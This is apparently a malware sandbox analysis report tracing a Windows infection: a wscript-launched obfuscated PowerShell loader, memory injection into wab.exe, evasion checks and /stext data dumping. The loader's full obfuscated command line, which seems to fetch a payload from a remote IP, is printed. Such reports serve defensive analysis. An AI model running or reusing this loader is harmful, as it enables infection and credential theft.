                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Program Files (x86)\Windows Mail\wab.exe | API/Special instruction interceptor: Address: 3EE1B0F
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6347
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3527
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7566
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2194
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 758
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 8707
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: foregroundWindowGot 1759
Source: C:\Program Files (x86)\Windows Mail\wab.exe | API coverage: 9.6 %
Source: C:\Windows\System32\wscript.exe TID: 7048 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1808 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280 | Thread sleep count: 7566 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280 | Thread sleep count: 2194 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5156 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6912 | Thread sleep time: -134000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6408 | Thread sleep time: -2274000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6408 | Thread sleep time: -26121000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 10_2_213610F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21366580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA, 10_2_21366580
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW, 14_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00418981 memset,GetSystemInfo, 14_2_00418981
Source: powershell.exe, 00000005.00000002.2520001892.0000000007A77000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: powershell.exe, 00000002.00000002.2660345822.00000284A5265000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: wscript.exe, 00000000.00000003.2094969947.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094557386.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094849673.00000222CB520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096463612.00000222CB521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095846541.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096763553.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095487135.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087476305.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2091106100.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089840993.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3372008001.00000000057FB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: bhvEF08.tmp.14.dr | Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: wscript.exe, 00000000.00000002.2097022655.00000222CD3F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
Source: wscript.exe, 00000000.00000003.2094557386.00000222CD3A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\S
Source: C:\Program Files (x86)\Windows Mail\wab.exe | API call chain: ExitProcess graph end node (graph_15-34129)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04EA9AD9 LdrInitializeThunk, 5_2_04EA9AD9
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_213660E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 14_2_004044A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21364AB4 mov eax, dword ptr fs:[00000030h] 10_2_21364AB4
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136724E GetProcessHeap, 10_2_2136724E
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21362B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_21362B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21362639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_21362639

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi64_3516.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A70000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 69F8D0
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip"
